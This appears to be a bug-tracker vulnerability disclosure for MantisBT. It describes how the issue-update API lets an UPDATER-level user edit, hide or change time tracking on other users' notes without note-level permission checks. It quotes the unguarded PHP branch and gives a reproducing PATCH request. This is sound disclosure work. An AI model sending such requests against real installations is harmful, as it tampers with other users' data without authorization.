| Description | mc_issue_update() accepts a notes array. When a note entry in that array
contains an id referencing an existing visible bugnote, the function applies
three direct DB-level operations without enforcing the corresponding access
thresholds:
-
bugnote_set_text() (line 1190) - no update_bugnote_threshold check.
Default threshold: DEVELOPER (55). An UPDATER (40) can modify any visible
note's text.
-
bugnote_set_view_state() (line 1195) - no
bugnote_user_change_view_state_threshold / change_view_status_threshold
check. Default threshold: UPDATER (40). But the guard in the normal
bugnote_set_view_state.php also checks update_bugnote_threshold (DEVELOPER)
for notes owned by others.
-
bugnote_set_time_tracking() (line 1200) - no time_tracking_enabled
feature gate and no time_tracking_edit_threshold check.
The only gating applied before reaching the note-update branch is
update_bug_threshold (issue-level, default UPDATER 40), which is lower than
update_bugnote_threshold (note-level, default DEVELOPER 55).
Relevant code at mc_issue_api.php:1185-1197:
if( array_key_exists( $t_bugnote_id, $t_bugnotes_by_id ) ) {
$t_bugnote_changed = false;
$t_bugnote = $t_bugnotes_by_id[$t_bugnote_id];
if( isset( $t_note['text']) && $t_bugnote->note !== $t_note['text'] ) {
bugnote_set_text( $t_bugnote_id, $t_note['text'] ); // no update_bugnote_threshold check
$t_bugnote_changed = true;
}
if( $t_bugnote->view_state != $t_view_state_id ) {
bugnote_set_view_state( $t_bugnote_id, $t_view_state_id == VS_PRIVATE ); // no view-state threshold check
$t_bugnote_changed = true;
}
if( isset( $t_note['time_tracking']) && $t_note['time_tracking'] != $t_bugnote->time_tracking ) {
bugnote_set_time_tracking( $t_bugnote_id, ... ); // no time_tracking_enabled or threshold check
$t_bugnote_changed = true;
}
|
|---|
| Steps To Reproduce | Precondition: authenticated user has update_bug_threshold access (UPDATER) but
not update_bugnote_threshold (DEVELOPER). Note 5 was created by a different user.
PATCH /api/rest/issues/1 HTTP/1.1
Authorization: Bearer <updater-api-token>
Content-Type: application/json
{
"summary": "Existing summary",
"description": "Existing description",
"reporter": {"id": 2},
"category": {"id": 1},
"notes": [
{
"id": 5,
"text": "EMBED-BYPASS-MODIFIED",
"view_state": {"name": "private"},
"time_tracking": {"duration": "2:00"}
}
]
}
Observed: note 5 text is changed, privacy toggled to private, time tracking
updated - all without the UPDATER having update_bugnote_threshold,
change_view_status_threshold, or time_tracking_edit_threshold access. |
|---|
| Additional Information | Severity:
Medium
Type:
Authorization bypass / missing access control
Affected code:
api/soap/mc_issue_api.php:1185-1206 (embedded note update branch)
REST: PATCH /api/rest/issues/{id} (delegates to mc_issue_update)
Impact:
An UPDATER (level 40) who cannot edit another user's note via the web interface or
the standalone note endpoint can bypass note-edit authorization by embedding the
modification inside a PATCH /api/rest/issues/{id} request. The same path allows
toggling note privacy and updating time-tracking data without the appropriate
per-note thresholds. |
|---|
